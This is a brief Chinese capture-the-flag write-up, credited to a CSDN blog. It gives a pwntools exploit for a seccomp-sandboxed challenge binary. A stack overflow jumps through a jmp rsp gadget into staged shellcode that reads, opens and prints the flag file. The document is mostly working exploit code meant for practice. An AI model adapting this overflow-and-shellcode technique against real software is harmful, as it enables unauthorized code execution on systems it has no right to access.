exp
有seccmop沙箱,只有几个函数可用,首先想到的思路是用orw打印flag。栈溢出长度有限写不下完整orw,但是题目栈和mmap分配的区域都可写可执行,我们只要通过jmp rsp控制程序流执行完整row即可
from pwn import *
io = process('./idaidg/linux_server64')
#io = remote('node3.buuoj.cn',25254)
context.binary=ELF('./bad')
jump_rsp = 0x400a01
mmap = 0x123000
payload = asm(shellcraft.read(0,mmap,0x100))+asm("mov rax,0x123000;call rax")
payload = payload.ljust(0x28,'a')
payload += p64(jump_rsp)
payload += asm('sub rsp,0x30;jmp rsp')
io.recvuntil('Easy shellcode, have fun!')
io.sendline(payload)
payload = ''
payload+=shellcraft.open('./flag')
payload+=shellcraft.read(3,mmap+0x200,0x100)
payload+=shellcraft.write(1,mmap+0x200,0x100)
sleep(0.2)
io.sendline(asm(payload))
io.interactive()
内容来源
https://blog.csdn.net/github_36788573/article/details/104780509